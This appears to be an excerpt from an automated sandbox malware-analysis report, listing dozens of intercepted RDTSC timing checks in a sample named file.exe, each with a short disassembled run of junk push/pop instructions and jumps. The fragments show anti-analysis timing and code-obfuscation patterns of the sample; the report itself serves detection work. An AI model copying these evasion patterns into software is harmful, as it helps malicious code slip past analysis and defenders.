Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C222 second address: B4C227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C227 second address: B4C236 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1CB4F79648h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C396 second address: B4C39A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C39A second address: B4C39E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C39E second address: B4C3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C3A4 second address: B4C3C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4F79657h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C3C1 second address: B4C3C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4C66D second address: B4C678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4FD2D second address: B4FD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F1CB4FA4D32h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4FD3B second address: B4FD43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F493 second address: B4F497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F497 second address: B4F4B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1CB4F79654h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F4B1 second address: B4F4BB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CB4FA4D22h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F4BB second address: B4F4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F1CB4F79646h 0x0000000a push edx 0x0000000b jmp 00007F1CB4F79653h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F1CB4F7964Fh 0x0000001b push edi 0x0000001c push edx 0x0000001d pop edx 0x0000001e pop edi 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F626 second address: B4F62B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F62B second address: B4F631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F631 second address: B4F637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F785 second address: B4F790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F1CB4F79646h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B4F790 second address: B4F7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F1CB4FA4D16h 0x0000000c popad 0x0000000d pushad 0x0000000e jl 00007F1CB4FA4D16h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B57B7C second address: B57B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55BAE second address: B55BC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CB4FA4D1Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55BC1 second address: B55BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4F7964Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007F1CB4F7964Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B55BE7 second address: B55BEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56153 second address: B56157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B56157 second address: B56174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5647E second address: B56485 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FCC7 second address: B5FCCD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FCCD second address: B5FCD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FCD3 second address: B5FCE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4FA4D1Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FCE6 second address: B5FCFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jnp 00007F1CB4F79648h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5FCFB second address: B5FD05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1CB4FA4D16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EEA8 second address: B5EECA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79658h 0x00000007 je 00007F1CB4F7964Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5EECA second address: B5EEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 jmp 00007F1CB4FA4D1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F146 second address: B5F14B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F27A second address: B5F27E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F55E second address: B5F568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1CB4F79646h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F568 second address: B5F595 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D26h 0x00000007 jmp 00007F1CB4FA4D1Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F595 second address: B5F5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4F7964Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F99A second address: B5F9A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F9A0 second address: B5F9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F1CB4F79658h 0x0000000d jc 00007F1CB4F79646h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6128F second address: B61295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68BCC second address: B68BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68BD0 second address: B68BFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D28h 0x00000007 jns 00007F1CB4FA4D16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jnc 00007F1CB4FA4D16h 0x00000016 pop edi 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B670AF second address: B670BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F1CB4F79646h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B670BC second address: B670C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B670C6 second address: B670E4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1CB4F79646h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F1CB4F7964Dh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B670E4 second address: B670EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B674FD second address: B6751D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1CB4F79646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F1CB4F7964Ch 0x00000010 ja 00007F1CB4F79646h 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007F1CB4F79646h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6751D second address: B67521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67689 second address: B6768D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B677F5 second address: B677F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B677F9 second address: B677FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B677FF second address: B67805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67805 second address: B6780F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F1CB4F79646h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6780F second address: B67813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67AE8 second address: B67AEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67AEE second address: B67AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F1CB4FA4D22h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B67AFC second address: B67B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1CB4F79646h 0x0000000a pushad 0x0000000b jmp 00007F1CB4F79654h 0x00000010 jng 00007F1CB4F79646h 0x00000016 jmp 00007F1CB4F7964Bh 0x0000001b popad 0x0000001c popad 0x0000001d push ecx 0x0000001e pushad 0x0000001f jns 00007F1CB4F79646h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B682CE second address: B682E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F1CB4FA4D1Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B689EF second address: B689F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B689F5 second address: B689F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6FD26 second address: B6FD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6FD2C second address: B6FD49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4FA4D24h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6FD49 second address: B6FD4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7301C second address: B73021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73021 second address: B73033 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1CB4F79648h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73033 second address: B7304C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4FA4D25h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7304C second address: B73061 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79651h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73061 second address: B73069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B73069 second address: B7306D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7C723 second address: B7C75C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1CB4FA4D23h 0x00000010 jmp 00007F1CB4FA4D21h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7DDCA second address: B7DDCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7DDCE second address: B7DDFA instructions: 0x00000000 rdtsc 0x00000002 js 00007F1CB4FA4D16h 0x00000008 jnl 00007F1CB4FA4D16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jc 00007F1CB4FA4D2Ch 0x00000016 jmp 00007F1CB4FA4D20h 0x0000001b jns 00007F1CB4FA4D16h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B7DDFA second address: B7DE1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4F79658h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA7290 second address: AA72A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4FA4D1Eh 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA72A3 second address: AA72D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CB4F79653h 0x00000008 jmp 00007F1CB4F79653h 0x0000000d jg 00007F1CB4F79646h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA72D9 second address: AA72DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA72DD second address: AA72E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8DA24 second address: B8DA29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B8DA29 second address: B8DA30 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9A601 second address: B9A607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9A607 second address: B9A614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F1CB4F79646h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B98F2C second address: B98F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1CB4FA4D16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B98F36 second address: B98F52 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F1CB4F79656h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9908D second address: B99093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99093 second address: B99099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B995B7 second address: B995BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B995BD second address: B995DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F1CB4F79655h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99756 second address: B9975E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9975E second address: B99762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99762 second address: B99777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1CB4FA4D16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99777 second address: B99784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 je 00007F1CB4F79646h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99784 second address: B997A1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1CB4FA4D27h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B997A1 second address: B997B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CB4F7964Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99914 second address: B99928 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1CB4FA4D1Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99928 second address: B9994A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1CB4F79659h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9994A second address: B99972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CB4FA4D1Dh 0x00000009 jmp 00007F1CB4FA4D27h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B99972 second address: B99978 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9A354 second address: B9A358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9A358 second address: B9A35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9A35E second address: B9A375 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CB4FA4D20h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9BB35 second address: B9BB39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9BB39 second address: B9BB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B9BB45 second address: B9BB72 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 ja 00007F1CB4F79646h 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F1CB4F79652h 0x00000019 jnp 00007F1CB4F79648h 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
